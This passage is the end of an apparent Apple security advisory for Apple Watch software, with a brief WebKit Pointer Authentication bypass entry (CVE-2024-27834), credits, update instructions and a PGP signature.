Impact: An attacker with arbitrary read and write capability may be able  
to bypass Pointer Authentication  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 272750  
CVE-2024-27834: Manfred Paul (@_manfp) working with Trend Micro's Zero  
Day Initiative

Additional recognition

App Store  
We would like to acknowledge an anonymous researcher for their  
assistance.

CoreHAP  
We would like to acknowledge Adrian Cable for their assistance.

HearingCore  
We would like to acknowledge an anonymous researcher for their  
assistance.

Managed Configuration  
We would like to acknowledge 遥遥领先 (@晴天组织) for their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmZCtuoACgkQX+5d1TXa  
IvoryhAA0MH7dQ2spvGCOs9o90Ha8QfUwkzV6S+x/kjtb+4dVh+Myyyxcq3HfJP/  
71NRMcHvxM2nE7d23D9TSDdkKqEckR/vpgRMR9oPPy+bLnqccu7Rx02dIyOcW0AD  
sOI+puKn2oVSENiQte+Rs5RBBslrzG5G+Ezr2BVyk5jA4q8f2yD3vFlc+4K6u4Xf  
xcM0rgqLTQ1Pe4CiJepLZlm5/I4ub9jNHgYw37lrBg8ptBBOP722Mt+XeuHcE0tr  
SCvoVCDePnbHPNzofgsSlv0bv6CpfvOYKgRouWzb3wf+a9Cg/2fPN39nZtVt7V+l  
WqSJjgGB71QgwtRpmr/nWz3VKzSE9xdnu0H6BOrVAC9qYWn1Qz9S0bfTVhWJDCvk  
XyGhpoHrsKOR/PDjm8nCx7MzqeWxsG/yaYHileud3a9tAx1g63kDrwaPjpG4sNg1  
U5pvYLE942yOoImWyFkfcnf9UCGqwdYiNR8uFyfuPoBFhiCM85CjwD3tM2UG0H5Q  
xxU1iYNIHPeDd4q5DEaFqtC3nNraY3JGoAO5im7vNFv4JcoiMb8ObNTLDkNduThd  
q1uB74m37Pfqq/PT2xtnACHfWpvUpu/Gc0JcUuS+uMB1nUbvPQpNNJqx7WHwk3Q2  
r8OvMZ1Vw+4APbZ7B5Jnj4pkxSAifC2HQ7FqytCGzRzGqHOrF60=  
=+u2d  
-----END PGP SIGNATURE-----

Tag

#webkit